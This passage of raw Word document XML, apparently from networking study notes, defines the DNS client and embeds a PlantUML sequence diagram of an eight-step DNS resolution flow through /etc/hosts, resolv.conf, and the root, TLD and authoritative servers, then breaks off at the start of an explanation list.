          <w:numId w:val="265"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DNS Records — store the mappings (A, AAAA, MX, CNAME, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517F4AE0" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00941B39">
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r>
        <w:t>Client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B68638C" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBFA21E" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00827649" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:r w:rsidRPr="00827649">
        <w:t xml:space="preserve">The DNS </w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00827649">
        <w:t xml:space="preserve">lient is the part of your operating system or application that initiates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00827649">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C2524A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2524A">
        <w:t xml:space="preserve"> (or </w:t>
      </w:r>
      <w:r w:rsidRPr="00C2524A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>DNS lookup</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2524A">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00C2524A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>DNS resolution</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2524A">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00827649">
        <w:t>when you request a domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BB0B79" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00941B39">
        <w:t>How It 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2"/>
        <w:gridCol w:w="404"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A60755" w14:paraId="1B43B8A3" w14:textId="77777777" w:rsidTr="00C541B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8748" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AB41219" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48A47FF2" wp14:editId="69CD4C24">
                  <wp:extent cx="10972800" cy="5924550"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="149591972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0" cy="5924550"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8748" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19272D90" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>@startuml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F0BB70C" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>title DNS Resolution – 8-Step Flow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F79F0A5" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1411C701" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>actor User</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="090C3BC5" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>participant Application</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="355DB634" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>participant "/etc/nsswitch.conf" as NSS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6723C739" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>participant "Resolver library" as Resolver</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="629EC9D8" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>participant "/etc/hosts" as Hosts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00B25224" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>participant "/etc/resolv.conf" as Resolv</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5405ED6B" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>participant "DNS server\n(recursive)" as DNS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02720083" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>participant "Local cache\n(systemd-resolved / nscd / app)" as Cache</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A8A49F9" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>participant "Root DNS" as Root</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5644D1FD" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>participant "TLD DNS" as TLD</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2938C368" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>participant "Authoritative DNS" as Auth</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01AD4739" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6F921265" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>User -&gt; Application: (1) Request "server1.example.com"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51D8B1D7" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>Application -&gt; NSS: (2) Determine lookup order</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="012B6D56" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>NSS --&gt; Application: hosts: files dns</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A0E22C1" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B582DE5" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>Application -&gt; Resolver: (3) Resolve hostname</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50E558DF" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>Resolver -&gt; Hosts: (3) Check static mapping in /etc/hosts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="098F4313" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="580CDE22" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>alt Found in /etc/hosts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00B29AF8" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Hosts --&gt; Resolver: IP address</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EEFBCB0" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Resolver -&gt; Cache: (8) Optionally cache result (TTL)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E26864E" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Resolver --&gt; Application: (7) Return IP to app</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16FB1F87" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Application --&gt; User: Connect to IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AF53291" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>else Not found in /etc/hosts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BA1CB2D" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Hosts --&gt; Resolver: Not found</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38FC69C5" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Resolver -&gt; Resolv: (4) Read DNS settings (nameserver, search)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46727E1D" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Resolv --&gt; Resolver: nameserver list (e.g., 8.8.8.8, 1.1.1.1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="315CE651" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="53FC8BB7" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Resolver -&gt; DNS: (5) Query first nameserver for A/AAAA</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A88C09A" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  opt (6) Recursive resolution (performed by DNS server)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B51949D" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    DNS -&gt; Root: Ask for .com NS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53BEF525" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    Root --&gt; DNS: Referral to TLD (.com)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FCF696D" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    DNS -&gt; TLD: Ask for example.com NS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="330C6466" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    TLD --&gt; DNS: Referral to authoritative</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D7462CF" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    DNS -&gt; Auth: Ask for server1.example.com A/AAAA</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74FFA385" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    Auth --&gt; DNS: Final answer (IP, TTL)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E311D21" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  end opt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D373F8D" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B8DBF6B" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  DNS --&gt; Resolver: (7) Answer (IP address)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27F53261" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Resolver -&gt; Cache: (8) Cache result locally (honor TTL)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="049A8A29" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Resolver --&gt; Application: (7) Return IP to app</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37B2EEFB" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Application --&gt; User: Connect to IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6686F3D7" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62456515" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>@enduml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A60755" w14:paraId="1181DF30" w14:textId="77777777" w:rsidTr="00C541B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8748" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="100F0F2C" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Explanation:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CC5C92D" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="264"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Application request</w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">: You run ping </w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
